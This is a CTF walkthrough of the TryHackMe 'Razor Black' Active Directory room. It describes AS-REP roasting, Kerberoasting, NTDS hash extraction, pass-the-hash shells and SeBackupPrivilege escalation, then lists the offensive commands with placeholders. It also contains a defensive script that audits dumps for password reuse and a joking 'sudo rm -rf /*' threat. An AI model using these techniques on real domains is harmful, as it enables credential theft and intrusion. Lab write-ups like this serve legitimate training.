Introduction

In this walkthrough, we covered Active Directory penetration testing and privilege escalation through techniques such as AS-REP roasting and Kerberoasting.

These guys call themselves hackers. Can you show them who’s the boss?

Throw something like a rock on the big green thingy on the right side here to deploy your box.

The box has ICMP enabled. So, look at ping first before starting recon and stop slapping `-Pn` on nmap.

This room is proudly made by: Xyan1d3

Recon and Initial Foothold

I started with a basic Nmap scan to see what ports were open. I found services like Kerberos, LDAP, and an NFS file share. I mounted the NFS share and found an Excel file with employee names and the first flag.

Using the employee list, I created a user list for Active Directory and performed AS-REP roasting to get a user hash. I cracked the hash with Hashcat and got a password.

With the username and password, I tried to access the SMB shares but was denied access to the “trash” share, which I knew contained a zip file. I used Metasploit to find other valid users and discovered that another user had the same password. This time, I was able to access the share and download the zip file. I then used zip2john and John the Ripper to crack the zip file’s password.

Hash Extraction and Privilege Escalation

Inside the zip file, I found a database of hashes. I used secretsdump.py in offline (local) mode to extract hashes from the system.hive and ntds.dit files. I then used the cut command to separate the usernames (first field) and the NT hashes (fourth field) of the secretsdump output into different files.

I used CrackMapExec to check which of the dumped hashes was valid for a specific user, “alvitrova,” and then used that hash with evil-winrm to get a shell on the system. I found an XML file with an encoded string, which I decoded using a PowerShell command to get the flag.

I then used GetUserSPNs.py to request the service ticket for another user, “zn,” who had a service principal name set (Kerberoasting), and cracked the resulting hash to get their password. I got a shell as “zn” and found another encoded flag in an XML file.

To get root, I used the whoami /all command and found that the “zn” user had the SeBackupPrivilege. I exploited this by creating a diskshadow script to back up the ntds.dit and system.hive files. I downloaded these files to my machine and used secretsdump.py again to get the administrator hash.

Root and Final Secrets 🚩

With the administrator hash, I used evil-winrm to get a root shell. I found the root.xml file, which contained an encoded password that I decoded to get the root flag.

I also found a flag for the user “tyson” in a text file in their user directory.

For the final secret, I navigated to the “Top Secret” directory in “Program Files” and found an image file. The image contained a message about exiting vim, leading me to the final secret: :wq.

Technical Commands Used

Here are the technical commands I used in the terminal during the demonstration:

Nmap and NFS

  • sudo nmap -sV [IP address]
  • nmap -p [port] [IP address]
  • showmount -e [IP address]
  • sudo mount -t nfs -o vers=3 [IP address]:/users /home/user/users_thm

File and Hash Operations

  • python3 GetNPUsers.py [domain]/ -dc-ip [IP address] -usersfile users_rz.txt -format hashcat -outputfile asrep_hash.txt
  • hashcat -m 18200 asrep_hash.txt [wordlist]
  • zip2john [zip_file] > [output_hash_file]
  • john --wordlist=[wordlist] [hash_file]
  • python3 secretsdump.py -system [system_file] -ntds [ntds_database] local -outputfile hashes_v1.txt
  • cut -d':' -f1 hashes_v1.txt > users_v2.txt
  • cut -d':' -f4 hashes_v1.txt > hashes_v2.txt
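The cut commands above split the secretsdump output into usernames and NT hashes. The same file is what a defender audits after an incident like this one, because the pivot in the walkthrough only worked because two accounts shared a password. The script below is an added example, not part of the original walkthrough: it parses secretsdump's NTDS line format and reports NT hashes shared by several accounts, blank passwords, and accounts that still store an LM hash. The domain, account names and hash values in the sample are constructed placeholders.

```python
from collections import defaultdict

# Well-known hashes of the empty string (not secrets): LM field == EMPTY_LM
# means no LM hash stored; NT field == EMPTY_NT means a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in secretsdump's NTDS output format. The domain,
# accounts and hash values are placeholders, not values from the room.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
EXAMPLE\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
EXAMPLE\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EXAMPLE\\svc_backup:1104:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE\\j.doe:1105:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE\\legacy:1106:11223344556677881122334455667788:abcdef0123456789abcdef0123456789:::
EXAMPLE\\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
EXAMPLE\\svc_backup:aes256-cts-hmac-sha1-96:00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff00ff
"""

def parse_dump(text):
    """Parse lines of the form domain\\user:rid:lmhash:nthash::: into dicts.
    Banner lines and Kerberos key lines do not match the shape and are skipped."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) != 7 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        records.append({"user": parts[0], "rid": int(parts[1]), "lm": lm, "nt": nt})
    return records

def audit(records):
    """Report NT hashes shared by several accounts (password reuse), blank
    passwords, and accounts that still carry an LM hash."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        "reused": {nt: users for nt, users in by_nt.items()
                   if len(users) > 1 and nt != EMPTY_NT},
        "blank": [r["user"] for r in records if r["nt"] == EMPTY_NT],
        "lm_present": [r["user"] for r in records if r["lm"] != EMPTY_LM],
    }

if __name__ == "__main__":
    for kind, hits in audit(parse_dump(SAMPLE_DUMP)).items():
        print(f"{kind}: {hits}")
```

Accounts listed under "reused" are the ones to reset first, since a single cracked or dumped password unlocks all of them at once.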

SMB and Metasploit

  • smbmap -u [username] -p [password] -H [IP address]
  • use auxiliary/scanner/smb/smb_enumusers
  • smbclient //[IP address]/[share_name] -U [username]%[password]

Shells and Privilege Escalation

  • crackmapexec smb [IP address] -u [username] -H [hash_file]
  • evil-winrm -i [IP address] -u [username] -H [hash]
  • $credential = Import-CliXml -Path "[path_to_xml_file]"
  • $credential.GetNetworkCredential().Password
  • python3 GetUserSPNs.py -dc-ip [IP address] [domain]/[username] -hashes :[hash] -request -outputfile zn_hash_v2.txt
  • whoami /all
  • diskshadow.exe /s diskshadow.txt
  • Import-Module [dll_file]
  • Copy-FileBackupPrivilege -Source "[source_path]" -Destination "[destination_path]"

Video Walk-through

TryHackMe Razor Black Room Answers

What is the Domain Name?

What is Steven’s Flag?

What is the zip file’s password?

What is Ljudmila’s Hash?

What is Ljudmila’s Flag?

What is Xyan1d3’s password?

What is Xyan1d3’s Flag?

What is the root Flag?

What is Tyson’s Flag?

What is the complete top secret?

Did you like your cookie?

Say Yes or I will do sudo rm -rf /* on your PC

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
